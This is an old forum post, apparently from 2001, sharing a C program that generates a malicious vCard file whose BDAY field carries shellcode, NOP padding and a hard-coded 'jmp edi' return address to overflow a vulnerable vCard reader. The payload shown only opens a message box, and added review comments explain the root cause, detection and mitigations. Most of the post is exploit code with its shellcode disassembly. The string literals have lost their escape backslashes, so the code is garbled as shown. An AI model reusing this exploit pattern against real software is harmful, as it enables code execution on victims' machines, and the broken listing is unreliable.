[ kajla @ 29.07.2001. 23:54 ] @
Posto je bilo pitanja u vezi sa ovim exploit-om odlucio sam da ga postujem(nadam se da su komentari pregledni): Code:
/*
 * Proof-of-concept generator: writes a file named vCard.vcf in which the
 * value of the BDAY: field is not a date but the concatenation of
 * shell_code, nops and eip (see the fprintf() call below).
 *
 * The page does not name the affected vCard reader or version. The layout
 * (payload, padding, then a 4-byte value the author calls "eip") is the
 * classic shape of a stack buffer overflow that overwrites a saved return
 * address, so presumably the target copies the BDAY value into a fixed-size
 * stack buffer without checking its length -- TODO confirm against the
 * original advisory.
 *
 * Defensive reading:
 *  - Root cause to fix in a parser: bound every field copy by the size of the
 *    destination and reject BDAY values that are not a well-formed date.
 *  - Detection idea: a .vcf whose BDAY value is long or contains bytes
 *    outside the printable date alphabet is anomalous.
 *  - The payload relies on hard-coded absolute addresses (see the author's
 *    notes on eip and MessageBoxA), so it is tied to one specific DLL build;
 *    address randomisation, non-executable stacks and stack cookies are the
 *    generic mitigations for this pattern.
 *
 * NOTE(review): as rendered on this page the string literals contain "x33",
 * "n" and so on with no backslash in front; the escape characters were
 * presumably lost when the post was extracted, so the listing as shown would
 * write plain ASCII text rather than the bytes the comments describe.
 *
 * NOTE(review): only <stdio.h> is included; exit(), clrscr() and getch() are
 * used without a declaring header (clrscr/getch are non-standard, Borland
 * conio-style calls), and main() has no explicit return type.
 */
#include <stdio.h>
main()
{
    FILE *f;

    /* Author's note: jmp edi. Written last in the BDAY value; presumably the
     * address of a "jmp edi" instruction meant to land on the saved return
     * address -- the page does not say which module it belongs to. */
    char eip[]="xc5x95x79x76"; /* jmp edi */

    /* Payload bytes; the author's disassembly follows. */
    char shell_code[]=
        "x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65"
        "x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B"
        "x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10";
    /* The shell_code I wrote does the following: it calls
       MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0)

       xor esi,esi
       push 0xBFF5412e ; address of MessageBoxA() in user32.dll
       push esi
       mov dword ptr[edx],72614376h
       mov dword ptr[edx+04h],78652064h
       mov dword ptr[edx+08h],696f6c70h
       mov dword ptr[edx+0Ch],79622074h
       mov dword ptr[edx+010h],6a616b20h
       mov dword ptr[edx+014h],esi
       mov word ptr[edx+014h],616ch
       push edx
       push edx
       push esi
       call dword ptr[esp+010h] */

    /* Padding placed between the payload and eip; presumably sized so that
     * eip lines up with the overwritten return address. */
    char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; /* 14 NOPS */

    /* vCard header up to and including the "BDAY:" property name; the
     * property value is supplied by the fprintf() below. */
    char body_text[]=
        "BEGIN:VCARDn"
        "VERSION:2.1n"
        "N:;kajlan"
        "FN:kajlan"
        "BDAY:";

    /* Remaining vCard properties and the END marker.
     * NOTE(review): "[email protected]" looks like an e-mail-obfuscation
     * placeholder inserted by the hosting site, not the author's value. */
    char end_text[]=
        "EMAIL;PREF;INTERNET:[email protected]"
        "REV:20010728T152652Zn"
        "END:VCARDn";

    clrscr();

    /* Create (or truncate) the output file in the current directory. */
    if ((f=fopen("vCard.vcf","w"))==NULL) {
        fprintf(stderr,"Cannot create file vCard.vcfn");
        exit(1);
    }

    /* File layout: header, then the BDAY value (shell_code + nops + eip),
     * an "n" separator, then the trailing properties. %s stops at the first
     * zero byte of each array. */
    fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text);
    fclose(f);

    printf("File: vCard.vcf created!");
    getch(); /* wait for a key press before exiting */
    return 0;
}
|